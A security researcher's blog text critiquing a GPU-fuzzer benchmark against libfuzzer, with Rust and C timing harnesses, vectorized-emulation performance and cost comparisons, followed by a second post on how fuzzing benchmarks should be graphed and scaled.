In their blog, they mention that “This isn’t an entirely fair comparison.”, and this is largely referring to the fact that their fuzzer is not providing mutated inputs to the function, whereas libfuzzer is. This is a major issue. However, their fuzzer is resetting the state of the target every fuzz case, and libfuzzer is relying on the function not having any persistent state that needs to be reset. This gives libfuzzer a large advantage. Finally, the GPU based fuzzer also works on binaries, where libfuzzer requires source, so once again, there are a lot of variables at play here. It is important to note, they’re mainly looking for order-of-magnitude estimates. But… this is a lot more than should be controlled for in my opinion. Important to also note that the blog concludes with a ~4x improvement over libfuzzer, thus, it’s well below the order-of-magnitude concerns of unfairness.

Of course, if you’ve read my blogs before, you’ll know I absolutely hate comparisons between problems with multiple variables. First of all, mutating an input is incredibly expensive, especially for a potentially large packet, say 1500 bytes. Further, the target which is being picked is a single function which, at first glance, does very little processing, but we’ll look into this more later.

So, let’s start off by eliminating one variable right away. What is the cost of generating an input from libfuzzer, and what is the cost of the actual function under test? This will effectively tell us how “fair” the execution comparison is; the binary vs source point is subjective, and clearly the binary-based engine is more impressive.

How do we do this? Well, let’s first figure out how fast libfuzzer can execute something that does literally nothing. This gives us a baseline of libfuzzer’s own overhead, independent of any real target.

#include <stdlib.h>
#include <stdint.h>

extern int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
  return 0;  // Non-zero return values are reserved for future use.
}
clang-12 -fsanitize=fuzzer -O2 test.c

We’ll run this test on a Intel(R) Xeon(R) Gold 6252N CPU @ 2.30GHz turboing to 3.6 GHz. This isn’t the same as their GCP setup, but we’ll do some of our own comparisons locally, thus we’re talking about relatives and not absolutes.

They don’t talk much in their blog about what they used to seed libfuzzer, so we’ll just give it no seeds and cap the input size to 1500 bytes, or about a single MTU for a network packet.

pleb@grizzly:~/libpcap/harness$ ./a.out -max_len=1500
INFO: Running with entropic power schedule (0xFF, 100).
INFO: Seed: 2252408900
INFO: Loaded 1 modules   (1 inline 8-bit counters): 1 [0x4ea0b0, 0x4ea0b1), 
INFO: Loaded 1 PC tables (1 PCs): 1 [0x4c0840,0x4c0850), 
INFO: A corpus is not provided, starting from an empty corpus
#2      INITED cov: 1 ft: 1 corp: 1/1b exec/s: 0 rss: 27Mb
#8388608        pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 4194304 rss: 28Mb
#16777216       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3355443 rss: 28Mb
#33554432       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3050402 rss: 28Mb
#67108864       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3195660 rss: 28Mb
#134217728      pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3121342 rss: 28Mb

Hmm, it seems it has settled in at about 3.12 million executions per second on a single core. Hmm, that seems a bit fast compared to the 1.9 million executions per second they see on their 8 thread machine in GCP, but maybe the target is really that complex and slows down performance.

Next, lets see how expensive the target code is outside of libfuzzer.

use std::time::Instant;
use pcap_sys::*;

#[link(name = "pcap")]
extern {
    fn bpf_filter_with_aux_data(
        pc: *const bpf_insn,
        p:  *const u8,
        wirelen: u32,
        buflen:  u32,
        aux_data: *const u8,
    );
}

fn main() {
    const ITERS: u64 = 100_000_000;

    unsafe {
        let mut program: bpf_program = std::mem::zeroed();

        // Ethernet linktype + 1500 snapshot length
        let pcap = pcap_open_dead(1, 1500);
        assert!(!pcap.is_null());

        // Compile the program
        let status = pcap_compile(pcap, &mut program,
            "dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or \
            atalk or aarp or decnet or iso or stp or ipx\0"
            .as_ptr() as *const _,
            1, PCAP_NETMASK_UNKNOWN);
        assert!(status == 0, "Failed to compile pcap thingy");

        let buf = vec![0u8; 1500];

        let time = Instant::now();
        for _ in 0..ITERS {
            // Filter a packet
            bpf_filter_with_aux_data(
                program.bf_insns,
                buf.as_ptr(),
                buf.len() as u32,
                buf.len() as u32,
                std::ptr::null()
            );
        }
        let elapsed = time.elapsed().as_secs_f64();

        print!("{:14.2} packets/second\n", ITERS as f64 / elapsed);
    }
}

We’re just going to compile the filter they mention in their blog, and then call bpf_filter_with_aux_data in a loop, applying the filter, and then we’ll print the number of iterations per second that we can do. In my specific case, I’m using libpcap-1.9.1 as distributed as a source code zip, this may differ slightly from their version.

pleb@grizzly:~/libpcap/harness$ RUSTFLAGS="-L../libpcap-1.9.1" cargo run --release
    Finished release [optimized] target(s) in 0.01s
     Running `target/release/harness`
   18703628.46 packets/second

Uh oh, that’s a bit concerning. The target can be executed about 18.7 million times per second, however libfuzzer is capped at pretty much a maximum of 3.1 million executions a second. This means the overhead of libfuzzer, which is not part of this comparison, is a factor of about 6. This means that libfuzzer is given about a 6x penalty, compared to the GPU fuzzer, which immediately gets rid of the ~4.4x advantage that the GPU fuzzer had over libfuzzer in their blog.

This unfortunately, was exactly as I expected. For a target this small, the overhead of creating an input greatly exceeds the cost of the target execution itself. This, unfortunately, makes the comparison against libfuzzer pretty much invalid in my eyes.

Trying to make the comparison closer

I’m lucky in that I have many binary-based snapshot fuzzers sitting around. It’s kind of my specialty. It’s important to note, from this point on, this comparison is for myself. It’s not to critique the blog, it’s simply for me to explore my performance against ToB’s GPU performance. I don’t care which one is better, this is largely for me to figure out if I personally want to start investing some time and money into GPU based fuzzing.

So, to start off, I’m going to compare the GPU fuzzer against my vectorized emulation. Vectorized emulation is a technique that I use to execute multiple VMs in parallel using AVX-512. In this specific case, I’m targeting a RISC-V processor (rv64ima) which will be emulated on my Intel machines by using AVX-512. Since 512 bits / 64 bits is 8, that means I’m running 8 VMs per hardware thread.

Vectorized emulation entirely contains only my own code. I wrote the lifters, the IL, the optimization passes, the JITs, the assemblers, the APIs, everything. This gives me a massive amount of control over adapting it to various targets, and make rapid changes to internals when needed. But, it also means, my code generation should be significantly worse than something like LLVM, as I do only the most basic optimizations (DCE, deduplication, etc). I don’t do any reordering, loop unrolling, memory access elision, etc.

Let’s try it!

The environment

To try to get as close as possible to comparing against ToB’s GPU fuzzer, I’m going to fuzz a binary target and provide no mutation of the inputs. I’m simply going to use a 1500-byte buffer containing zeros. Unfortunately, there are no specifics about what they used as an input, so we’re making the assumption that a 1500-byte zeroed out input and simply invoking bpf_filter_with_aux_data, waiting for it to return, then resetting VM memory back to the original state and running again is fair. Due to how many or conditions are used in the filter, and given the packet doesn’t match any of them, we should be seeing the worst case performance (eg. evaluating all expressions). I’m not perfectly familiar with BPF filtering, but I’d imagine there’s an early exit on a match, and thus if the destination was 1.2.3.4, I’d suspect the performance would be improved. Without this being clarified in the ToB blog, we’re just going with worst case (unless I’m incorrect in my understanding of BPF filters, maybe there’s no early exit).

Anyways, the target code that I’m using is as such:

use std::time::Instant;
use pcap_sys::*;

#[link(name = "pcap")]
extern {
    fn bpf_filter_with_aux_data(
        pc: *const bpf_insn,
        p:  *const u8,
        wirelen: u32,
        buflen:  u32,
        aux_data: *const u8,
    );
}

#[no_mangle]
pub extern fn fuzz_external() {
    const ITERS: u64 = 1;

    unsafe {
        let mut program: bpf_program = std::mem::zeroed();

        // Ethernet linktype + 1500 snapshot length
        let pcap = pcap_open_dead(1, 1500);
        assert!(!pcap.is_null());

        // Compile the program
        let status = pcap_compile(pcap, &mut program,
            "dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or \
            atalk or aarp or decnet or iso or stp or ipx\0"
            .as_ptr() as *const _,
            1, PCAP_NETMASK_UNKNOWN);
        assert!(status == 0, "Failed to compile pcap thingy");

        let buf = vec![0x41u8; 1500];

		// Filter a packet
		bpf_filter_with_aux_data(
			program.bf_insns,
			buf.as_ptr(),
			buf.len() as u32,
			buf.len() as u32,
			std::ptr::null()
		);
    }
}

fn main() {
    fuzz_external();
}

This is effectively the same as above, but it no longer loops. But, since I’m using a binary-based snapshot fuzzer, and so are they, we’re going to actually snapshot it. So, instead of running this entire program every fuzz case, I’m going to put a breakpoint on the first instruction of bpf_filter_with_aux_data, and run the RISC-V JIT until it hits it. Once it hits that breakpoint, I will make a snapshot of the memory state, and at that point I will create threads which will work on executing it in a loop.

Further, I will add another breakpoint on the return site of bpf_filter_with_aux_data to immediately terminate the fuzz case upon return. This avoids having the program do cleanup (like freeing buf), and otherwise bubbling up to an exit() syscall. Their blog isn’t super clear about this, but from their wording, I suspect this is a pretty similar setup. Effectively, only bpf_filter_with_aux_data is executing, and once it is not, the VM is reset and run again.
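
In rough pseudocode (the `Vm` API below is completely hypothetical, not my real emulator interface), the harness loop looks something like this:

/// Stand-in for all memory + register state needed to restore
struct Snapshot;

trait Vm {
    /// Run until execution hits the breakpoint at `addr`
    fn run_until(&mut self, addr: u64);
    /// Capture all state needed to restore later
    fn snapshot(&self) -> Snapshot;
    /// Differentially restore back to a previously taken snapshot
    fn restore(&mut self, snap: &Snapshot);
}

fn fuzz<V: Vm>(vm: &mut V, func_entry: u64, func_return: u64) {
    // Run the target normally until the first instruction of
    // bpf_filter_with_aux_data, and snapshot there
    vm.run_until(func_entry);
    let snap = vm.snapshot();

    loop {
        // Execute only the function under test; the breakpoint on the
        // return site ends the case before any cleanup or exit() happens
        vm.run_until(func_return);

        // Reset memory and registers back to the snapshot and go again
        vm.restore(&snap);
    }
}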

My emulator has many different operating modes. I have different coverage levels (covering blocks, covering PCs, etc), different levels of memory protection (eg. byte-level permissions which cause every byte to have its own permissions), uninitialized memory tracking (accessing allocated memory and stacks is invalid unless it has been written to first), as well as register taint tracking (logging when user input affected register state for both register reads and writes).
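
For a rough idea of what byte-level permissions with uninitialized memory tracking conceptually look like, here’s a simplified scalar model (the real thing lives in the JIT and looks nothing like this, but the semantics are similar):

// One permission byte per byte of guest memory
const PERM_READ:  u8 = 1 << 0; // byte may be read
const PERM_WRITE: u8 = 1 << 1; // byte may be written
const PERM_RAW:   u8 = 1 << 2; // read-after-write: readable only once written

struct SoftMmu {
    memory: Vec<u8>,
    perms:  Vec<u8>, // parallel to `memory`
}

impl SoftMmu {
    /// Read bytes, faulting at the first byte which is not readable. Reading
    /// allocated-but-uninitialized memory (RAW set, READ not yet set) faults.
    fn read(&self, addr: usize, buf: &mut [u8]) -> Result<(), usize> {
        for (ii, byte) in buf.iter_mut().enumerate() {
            if self.perms[addr + ii] & PERM_READ == 0 {
                return Err(addr + ii);
            }
            *byte = self.memory[addr + ii];
        }
        Ok(())
    }

    /// Write bytes, faulting at the first byte which is not writable. Writing
    /// to RAW memory makes it readable, which is how uninitialized memory
    /// tracking falls out of the model.
    fn write(&mut self, addr: usize, buf: &[u8]) -> Result<(), usize> {
        for (ii, &byte) in buf.iter().enumerate() {
            let perm = self.perms[addr + ii];
            if perm & PERM_WRITE == 0 {
                return Err(addr + ii);
            }
            self.memory[addr + ii] = byte;
            if perm & PERM_RAW != 0 {
                self.perms[addr + ii] |= PERM_READ;
            }
        }
        Ok(())
    }
}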

Since many of these vary in performance, I’ve set up a few tests with a few common configurations. Further, I’ve provisioned a 60 core c2-standard-60 (30 Cascade Lake Intel cores, totalling 60 hyper-threads) machine from Google Cloud Project to try to apples-to-apples as best I can. This machine costs $3.1321/hour, and thus, we’ll have to divide by these costs to make it fair when we do dollar-based comparisons.

Here… we… go!

image

Okay cool, so what is this graph telling us? Well, it’s showing us the number of iterations per second per core on the Y axis, against the number of cores being used on the X axis. This is not just telling me the overall performance, but also the scaling performance of the fuzzer, or how well it uses cores.

We’re going to ignore all lines other than the top line, the one in purple (blue?). We see that the line is relatively flat until 30 cores, then it starts falling off. This is great! This lines up with what we ideally want. The emulator is scaling linearly as cores are added, until we start getting past 30 cores, where they become hyperthreads and they’re not actually physical cores. The fact that the line is flat until 30 cores makes me very happy, and a lot of painstaking engineering went into making that work!

Anyways, we have multiple lines here. The top line, to no surprise, is gathering no coverage information, isn’t tracking taint, nor is it checking permissions. Of course it’s the fastest. The next line, in green, only adds block-level code coverage. It’s almost no performance hit, and nor would I expect it to be. The JIT self-modifies once coverage has been reported, and thus the only cost is a bit of icache pollution due to some nopped out code being jumped over.

Next, we have the light blue line, which at this stage, is the first line that actually matters. This one adds checking of permissions, as well as uninitialized memory tracking. This is done at a byte-level, and thus behaves very similarly to ASAN (in fact, it allows arbitrary byte-sized holes in memory, where ASAN can only mark trailing bytes as inaccessible). This of course, has a performance cost. And this is the real line, there’s no way I’d ever run a fuzzer without permission checks as the target would simply crash the host. I could use a more relaxed permission checking model (like using the hardware MMU on Intel to provide 512-byte-level permissions (4096-byte pages / 8 VMs interleaved per page)), and I’d have the green line in performance, but it’s not worth it. Byte level is too important to me.

Finally, we have the orange line. This one adds register “taint” tracking. This effectively horizontally looks at neighboring VMs during execution to determine if one VM has written or read a different value to a register. This allows me to observe and feed back information about which register values are influenced by the user input, and thus is important information for cutting down on mutation wastes. That being said, we’re not mutating, so it doesn’t really matter, we’re just looking at the runtime costs of this instrumentation.
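
One way to picture the horizontal comparison is below, written as plain scalar code rather than AVX-512, and with the policy boiled down to “any lane which differs from lane 0 gets its taint bit set”; the real implementation is more nuanced, this is just the gist.

/// One guest register across the 8 VMs sharing an AVX-512 register,
/// one 64-bit lane per VM (purely an illustrative layout)
type Lanes = [u64; 8];

/// After the VMs update a register, compare every lane against lane 0. Any
/// lane which differs diverged because of its input, so mark that VM's
/// taint bit for this register.
fn update_taint(new_value: &Lanes, taint: &mut u8) {
    for lane in 1..8 {
        if new_value[lane] != new_value[0] {
            *taint |= 1u8 << lane;
        }
    }
}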

Where does this leave us? Well, we see that on the 60 core machine, with the light blue line (the one we care about), we end up getting about 4.1 million iterations per second per core. Since we’re running 60 cores (technically 60 threads) at this rate, we can just multiply to see that we’re getting about 250 million iterations per second on this 60 core c2-standard-60 machine.

Well, this is the number we want. What does this come out to for iterations/second/$? Simply divide 250 million by $3.1321/hour, and we get about 79.8 million iters/second/dollar/hour.

I don’t have access to their GPU code so I can’t reproduce it, but their number they claim is 8.4M iterations/second on the $0.35/hour GPU, and thus, 23.9 million iters/second/dollar/hour.

This gives vectorized emulation about a 3x advantage for performance per dollar compared to the GPU based compute. It’s important to note, both technologies have some pretty large improvements to performance which may be possible. I suspect with some optimization both could probably see 2-3x improvements, but at that point they start hitting some very real hardware limitations in performance.

Where does this leave us?

I have some suspicions that GPUs will struggle with low latency memory accesses, especially when so many VMs are diverging and doing different things. These benchmarks are best case for both these technologies, as the inputs aren’t affecting execution flow, and the memory utilization is quite low.

GPUs have some major memory limitations that I think make them impractical for fuzzing. As mentioned in the ToB blog, a 16 GiB GPU running 40,000 threads only has 419 KiB per thread available for storage. This means the corpuses, coverage databases, and all memory modified by a fuzz case must be below 419 KiB. This unfortunately isn’t a very practical limit. Right now I’m doing some freetype2 fuzzing in light of the Google Project Zero CVE-2020-15999, and I’m pushing 50 GiB of memory use for the 1,536 VMs I run. Vecemu does memory deduplication and CoW for all memory, and thus my memory use is quite low. Ultimately, there are user-controlled allocations that occur, and re-claiming the memory every fuzz case doesn’t prove very feasible. This is also a tiny target; I fuzz many targets where the input alone exceeds 1 MiB, let alone other memory used by the target.

Nevertheless, I think these problems may be solvable with creative use of transferring memory in blocks, or maybe chunking fuzz cases into sections which use less than 400 KiB at a time, or maybe just reduce the number of threads. There’s definitely solutions here, and I definitely don’t doubt that it’s possible, but I do wonder if the overheads and complexities beat what can be done directly on the CPU with massive caches and access to all memory at a relatively low cost (as opposed to GPU<->CPU memory access).

Is there more perf?

It’s important to note that my vectorized emulation is not running faster than native execution. I’m still emulating RISC-V and applying some really strict memory permission checks that slow things down, this makes my memory accesses really expensive. I am happy to see though, that vectorized emulation looks to be within about ~3x of native execution (18M packets/second in our native libpcap harness mentioned early on, 5.5M with ours). This is pretty crazy, given we’re working with binaries and applying byte-level permissions to a target which isn’t even supported by ASAN! How cool is that!?

Vectorized emulation runs close to or faster than native execution when the target has few memory loads and stores. This is by far the bottleneck (~80%+ of CPU time is spent doing my memory translations). Doing some optimization passes to reduce memory loads and stores in my IL would probably allow me to realize some of these gains.

Since I’m not running at native speeds, we know that this isn’t as fast as could be done by just building libpcap for x86 and running it. Of course this requires source, but we know that we can get about a 3x speedup by fuzzing it natively. Thus, if I have a 3x improvement on the GPU fuzzing cost effectiveness, and there’s a 3x speedup from my emulation to just “running it natively on x86”, then there’s a 9x improvement from GPU execution to just run it natively.

This kinda… proves my earlier point. The benchmark is not comparing libfuzzer to the GPU fuzzer, it’s comparing the GPU fuzzer running a target against libfuzzer performing orchestration of a fuzzer and mutations. It’s just… not really comparing anything valuable. But of course, like I always complain about, public fuzzer performance is often not great. There are improvements we can get to our fuzzing harnesses, and as always, I implore people to explore the powers of in-memory, snapshot based fuzzing! Every time you do IPC, update an atomic, update/check a database, do an allocation, etc, you lose a lot of performance (when running at these speeds). For example, in vectorized emulation for this very blog, I had to batch my fuzz case increments to only happen a few times a second. Having all threads updating an atomic ~250M times a second resulted in about a 60% overall slowdown of the entire harness. When doing super tight loop fuzzing like this (as uncommon as it may be), the way we write fuzzing harnesses just doesn’t work.

But wait… what even are these dollar amounts?

So, it seems that vectorized emulation is only slightly faster than the GPU results (~3x). Vectorized emulation also has years of research into it, and the GPU research is fairly new. This 3x advantage is honestly not a big deal, it’s below the noise floor of what really matters when it comes to accessibility of hardware. If you can get GPUs or GPU developers easier than AVX-512 CPUs and developers, the 3x difference isn’t going to make a difference.

But we have to ask, why are we comparing dollar amounts? The dollar amounts are largely to determine what is most cost effective, that makes sense. But… something doesn’t seem right here.

The GPU they are using is an NVIDIA Tesla T4 and costs $0.35/hour on Google Cloud Project. The CPU they are using (for libfuzzer) is a quad core Skylake which costs $0.38/hour, or almost 10% more. What? An NVIDIA Tesla T4 is $2,152 (cheapest price I could find), and a quad core Skylake is $150. What the?

Once again, I hate the cloud. It’s a pretty big ripoff for long-running compute, but of course, it can save you IT costs and allow you to dynamically spin up.

But, for funsies, let’s check the performance per dollar for people who actually buy their hardware rather than use cloud compute.

For these benchmarks I’m going to use my own server that I host in my house and purchased for fuzzing. It’s a quad socket Xeon 6252N, which means that in total it has 96 cores and 192 threads, clocking at 2.3 GHz base, turboing to 3.6 GHz. The MSRP (and price I paid) for these processors is $1788. Thus, ~$7,152 for just the processors. Throw in about $2k for a server-grade chassis + motherboard + power supplies, and then ~$5k for 768 GiB of RAM, and you get to the $14-15k mark that I paid for this server. But, we’ll simplify it a bit, we don’t need 768 GiB of RAM for our example, so we’ll figure out what we want in GPUs.

For GPUs, the Tesla T4s are $2,152 per GPU, and have 16 GiB of RAM each. Lets just ignore all the PCI slotting, motherboards, and CPU required for a machine to host them, and we’ll just say we build the cheapest possible chassis, motherboard, PSU, and CPUs, and somehow can socket these in a $1k server. My server is about $9k just for the 4 CPUs + $2k in chassis and motherboards, and thus that leaves us with $8k budget for GPUs. Lets just say we buy 4 Tesla T4s and throw them in the $1k server, and we got them for $2k each. Okay, we have a 4 Tesla T4 machine and a 4 socket Xeon 6252N server for about $9k. We’re fudging some of the numbers to give the GPUs an advantage since a $1k chassis is cheap, so we’ll just say we threw 64 GiB into the server to match the GPUs ram and call it “even”.

Okay, so we have 2 theoretical systems. One with 96C/192T of Xeon 6252Ns and 64 GiB RAM, and one with 4 Tesla T4s with 64 GiB VRAM. They’re about $9k-$11k depending on what deals you can get, so we’ll say each one was $9k.

Well, how does it stack up?

I have the 4x 6252N system, so we’ll run vectorized emulation in “light blue” line mode (block coverage, byte-level permissions, uninitialized mem tracking, and no register taint tracking), this is a common mode for when I’m not fuzzing too deep on a target. Well, lets light up those cores.

lolcores

Sweet, we’re under 10 GiB of memory usage for the whole system, so we’re not really cheating by skimping on the memory in our theoretical 64 GiB build.

Well, we’re getting about 700 million fuzz cases per second on the whole system. Woo! That’s a shitton! That is 77k iters/second/$. Obviously this seems “lower” than what we saw before, but this is the iters/second for a one time dollar investment, not a per-hour cloud fee.

So… what do we get on the GPU? Well, they concluded with getting 8.4 million iters/sec on the cloud compute GPU. Assuming it’s close to the performance you get on bare metal (since they picked the non-preemptable GPU option), we can just multiply this number by 4 to get the iters/sec on this theoretical machine. We get 33.6 million iterations per second total, if we had 4 GPUs (assuming linear scaling and stuff, which I think is totally fair). Well… that’s 3,733 iters/second/$… or about 21x more expensive than vectorized emulation.

What gives? Well, the CPUs will definitely use more power, at 150W each you’ll be pushing 600W minimum, but I observe more in the ballpark of 1kW when running this server, when including peripherals and others. The Tesla T4 is 70W each, totalling 280W. This would likely be in a system which would be about 200W to run the CPU, chassis, RAM, etc, so lets say 500W. Well, it’d be about 1/2 the wattage of the CPU-based solution. Given power is pretty cheap (especially in the US), this difference isn’t too major, for me, I pay $0.10/kWh, thus the CPU server would cost about $0.20 per hour, and the GPU build would cost about $0.10 per hour (doubled for cooling). These are my “cloud compute” runtime costs, and thus the GPUs are still about 10x more expensive to run than the CPU solution.

Conclusion

As I’ve mentioned, this GPU based fuzzing stuff is incredibly cool. I can’t wait to see more. Unfortunately, some of the methodologies of the comparison aren’t very fair and thus I think the claims aren’t very compelling. It doesn’t mean the work isn’t thrilling, amazing, and incredibly hard, it just means it’s not really time yet to drop what we’re doing to invest in GPUs for fuzzing.

There’s a pretty large discrepancy in the cost effectiveness of GPUs in the cloud, and this blog ends up getting a pretty large advantage over libfuzzer for something that is really just a pricing decision by the cloud providers. When purchasing your own gear, the GPUs are about 10x more expensive than the CPUs that were used in the blog’s tests (quad-core Skylake @ $200 or so vs a NVIDIA T4 @ $2000). The cloud prices do not reflect this difference, and in the cloud, these two solutions are the same price. That being said, those are real gains. If GPUs are that much more cost effective in the cloud, then we should definitely try to use them!

Ultimately, when buying the hardware, the GPU solution is about 20x less cost effective than a CPU based solution (vectorized emulation). But even then, vectorized emulation is an emulator, and slower than native execution by a factor of 3, thus, compared to a carefully crafted, low-overhead fuzzer, the GPU solution is actually about 60x less cost effective.

But! The GPU solution (as well as vectorized emulation) allow for running closed-source binary targets in a highly efficient way, and that definitely is worth a performance loss. I’d rather be able to fuzz something at a 10x slowdown, than not being able to fuzz it at all (eg. needing source)!

Hats off to everyone at Trail of Bits who worked on this. This is incredibly cool research. I hope this blog didn’t come off as harsh, it’s mainly just me recording my thoughts as I’m always chasing the best solution for fuzzing! If that means I throw away vecemu to do GPU-based fuzzing, I will do it in a heartbeat. But, that decision is a heavy one, as I would need to invest thousands of hours in GPU development and retool my whole server room! These decisions are hard for me to make, and thus, I have to be very critical of all the evidence.

I can’t wait to see more research from you all! This is incredible. You’re giving me a real run for my money, and in only 2 months of work, fucking amazing! See you soon!


Random opinions

I’ve been asked a few things about my opinion on the GPU-based fuzzing, I’ll answer them here.

Is not having syscalls a problem?

No. It’s not. It is for people who want to use the tool. But this is a research tool and is for exploring what is possible; the act of fuzzing on a GPU by running binary translated code is incredible, and that’s the focus here! GPUs are Turing complete, so we can definitely emulate syscalls on them if needed. It might be a lot of work, a lot of plumbing, maybe a perf hit, but it doesn’t stop it from being possible. Most of my fuzzers rely on emulating syscalls.

There’s also nothing preventing GPUs from being used to emulate a whole OS. You’d have to handle self-modifying code and virtual memory, which can get very expensive in an emulator, but with software TLBs these things can be manageable to a level where it’s still worth doing!


Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

Some thoughts on fuzzing

11 August 2020 at 07:11

Foreward

This blog is a bit weird, this is actually a message I posted in response to a fuzzbench issue, but honestly, I think it warranted a blog, even if it’s a bit unpolished!

You can find the discussion at fuzzbench issue tracker #654

Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

The blog

Hello again Today!

So, I’d like to address a few things that I’ve thought of a bit more over time and want to emphasize.

Visualizations, and what I’m often looking for in data

When it comes to visualizations, I don’t really mind much which graphs are displayed by default, linear vs logscale, time-based or per-case-based, but both should be toggleable in the default view. I’m not a web dev, but having an interactive graph would be pretty nice, allowing for turning on and off of certain lines, zooming in and out, and changing scales/axes. But, I think we’re in agreement here. I personally believe that logscale should be the default, and I don’t see how it’s anything but better, unless you only care about seeing where things “flatten out”. But in that case, it’s just as visible in logscale, you just have to be logscale aware.

Here’s an example of what I typically graph when I’m running and tuning a fuzzer. I’m doing side-by-side comparisons of small fuzzer tweaks against my prior best runs, and plotting both on a time domain and a fuzz case domain. I’ve included the linear-scale plots just for comparison with the way we currently do things, but I personally never use linear scale as I just find it to be worse in all aspects.

image

By using a linear scale, we’re unable to see anything about what happens in the fuzzer in the first ~20 min or so. We just see a vertical line. In the log scale we see a lot more of what is happening. This graph is comparing a fuzzer which does rand() % 20 rounds of mutation (medium corruption), versus rand() % 5 rounds of the same corruption (low corruption). We can see that early on medium corruption has much better properties, as it explores more aggressively. But there’s actually a point where they cross, and this is likely the point where the corruption becomes too great on average in the medium corruption, and ends up “ruining” previously good inputs, dramatically reducing the frequency we see good cases. It’s important to note that since the medium corruption is a superset of low corruption (eg, there’s a chance to do low corruption), both graphs would eventually converge to the exact same value.

There’s just so much information in this graph that stands out to me. I see that something about medium corruption performs well in the first ~100 seconds. There’s a really good lead at the early few seconds, and it tapers off throughout. This gives me feedback on maybe when and where I should use this level of corruption.

Further, since I have both a fuzz case graph and a time graph, I can see that medium corruption early on actually has better performance than low corruption. Once again, this makes sense, the more corruption, the more likely you are to make a more invalid input which is parsed more shallow. But from the coverage over case, I see that this isn’t a long term thing and eventually the performance seems to converge between the two. It’s important to note, the intersection point of the two lines varies by quite a bit in both the case domain and the time domain. This tells me that even though I just changed the mutator, it has affected the performance, likely due to the depth of the average input in the corpus, really neat!

Example analysis conclusion

I see that medium corruption in this case is giving me about 10x speedup in time-to-same-coverage, and also some performance benefits early on. I should adopt a dynamic corruption model which tunes this corruption amount maybe against time, or ideally, some other metric I could extract from the target or stats. I see that long-term, the low corruption starts to win, and for something that I’d run for a week, I’d much rather run the low corruption.
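
As a toy sketch of what such a dynamic corruption model could look like (the breakpoints and rates below are made up, and ideally this would key off a feedback metric rather than wall-clock time):

use std::time::Instant;

/// Corrupt aggressively early in the campaign, then back off for the long
/// haul; the thresholds here are placeholders, not tuned values
fn corruption_rounds(campaign_start: Instant) -> usize {
    match campaign_start.elapsed().as_secs() {
        0..=100    => 20, // "medium" corruption while coverage is cheap
        101..=1000 => 10,
        _          => 5,  // "low" corruption wins long-term
    }
}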

Even though this program is very simple, these graphs could pretty arbitrarily be stretched out to a different time axis. If fuzzbench picks a deadline, for example, 1000 seconds, we would never know this about the fuzzer performance. I think this is likely what many fuzzers are now being tuned to, as the benchmarks often are 12/24/72 hour increments. Fuzzers often get some extra blips even deeper in the runs, and it’s really hard to estimate if these crosses would ever occur.

The case for cases

I personally extract most information from graphs which are plotted against number of fuzz cases rather than time. By doing benchmarks in a time domain, you factor in the performance of the fuzzer. This is the ground truth, and what really matters at the end of the day with complete products. But it’s not the ground truth for fuzzers in development. For example, if I wanted to prototype a new mutation strategy for AFL, I would be forced to do it in C, avoid inefficient copies, avoid mallocs, etc. I effectively have to make sure my mutator is at-or-better than existing AFL mutator performance to use benchmarks like this.

When you do development on fuzz cases, you can start to inspect the efficiency of the fuzzer in terms of quality of cases produced. I could prototype a mutator in python for all I care, and see if it performs better than the stock AFL mutators. This allows me to cut corners and spend 1 day trying out a mutator, rather than 1 month making a mutator and then doing complex optimizations to make it work. During early stages of development, I would expect a developer to understand the ramifications of making it faster, and to have a ballpark idea of where it could be if the O(n^3) logic was turned into O(log n), and whether it’s possible.

Often times, the first pass of an attempt is going to be crude, and for no reason other than laziness (and not in a negative way)! There’s a time and a place to polish and optimize a technique, and it’s important that there can be information learned from very preliminary results. Most performance in standard feedback mechanisms and mutation strategies can be solved with a little bit of engineering, and most developers should be able to gauge the best-case big-O for their strategy, even if that’s not the algorithmic complexity of their initial implementation.

Yep, looking at coverage over cases adds nuance, but I think we can handle it. Given most fuzzing tools, especially initial passes, are already so un-optimized, I’m really not worried about any performance differences in AFL/libfuzzer/etc when it comes to single-core performance.

Scaling

Scaling of performance is really missing from fuzzbench. At every company I’ve worked at, big and small, even for the most simple targets we’re fuzzing we’re running at least ~50-100 cores. I presume (I don’t know for sure) that fuzzbench is comparing single core performance. That’s great, it’s a useful stat and one I often control for, as single-core coverage/case controls for both scaling and performance, leading to great introspection into the raw logic of the fuzzer.

However, in reality, the scaling of these tools is critical for actual use. If AFL is 20% faster single-core, that’ll likely make it show up at the top of fuzzbench, given relative parity of mutation strategies. That’s great, the performance takes engineering effort and should not be undervalued. In fact, most of my research is focused around making fuzzers fast, I’ve got multiple fuzzers that can handle 10s of billions of fuzz cases per second on a single machine. It’s a lot of work to make these tools scale, much more so than single-core performance, which is often algorithmic fixes.

If AFL is 20% faster single-core but bottlenecks on fork() or write(), and thus only scales to 20-30 cores (often where I see AFL really fall apart on medium size targets, and 5-10 cores for small targets), while something like libfuzzer manages things in memory and can scale linearly with as many cores as you throw at it, then libfuzzer is going to blow away any 20% performance gains seen single-core.

This information is very hard to benchmark. Well, not hard, but costly. Effectively, I’d like to see benchmarks of fuzzers scaled to ~16 cores on a single server, and ~128 cores distributed across at least 4 servers. This benchmarks: A. whether the fuzzer can scale in the first place (if it can’t, that’s a big hit to real-world usability), B. whether it can scale across servers, often over the network (things like AFL-over-SMB would have brutal scaling properties here), and C. the scalability properties between cores on the same server, and how they transfer over the network.

I find it very unlikely that these fuzzers being benchmarked even remotely have similar scaling properties. AFL struggles to scale even on a single server, even in persistent mode, due to the heavy use of syscalls and blocking IPC every fuzz case (signal(), read(), write(), per case IIRC, ~3-4 syscalls).

